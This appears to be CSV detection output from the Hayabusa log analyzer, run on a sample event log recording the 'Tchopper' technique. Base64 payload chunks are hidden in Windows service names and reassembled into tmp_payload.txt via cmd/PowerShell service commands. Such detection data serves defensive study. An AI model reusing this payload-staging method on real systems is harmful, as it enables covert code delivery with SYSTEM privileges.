+2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
